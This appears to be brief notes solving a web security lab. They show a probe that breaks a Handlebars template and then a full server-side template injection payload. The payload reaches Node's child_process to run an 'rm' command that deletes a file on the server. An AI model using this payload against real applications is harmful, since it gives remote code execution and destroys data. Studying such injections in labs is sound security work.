// Trigger template engine exception with:
GET /?message=}}{{ HTTP/1.1

// Identified it is NodeJS Handlebars Template engine
// Found this Handlebars Template Injection: http://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html
// Use the exploit developed, must URL encode
wrtz{{#with "s" as |string|}}
  {{#with "e"}}
    {{#with split as |conslist|}}
      {{this.pop}}
      {{this.push (lookup string.sub "constructor")}}
      {{this.pop}}
      {{#with string.split as |codelist|}}
        {{this.pop}}
        {{this.push "return require('child_process').exec('rm /home/carlos/morale.txt');"}} # require('child_process') is Nodejs function
        {{this.pop}}
        {{#each conslist}}
          {{#with (string.sub.apply 0 codelist)}}
            {{this}}
          {{/with}}
        {{/each}}
      {{/with}}
    {{/with}}
  {{/with}}
{{/with}}
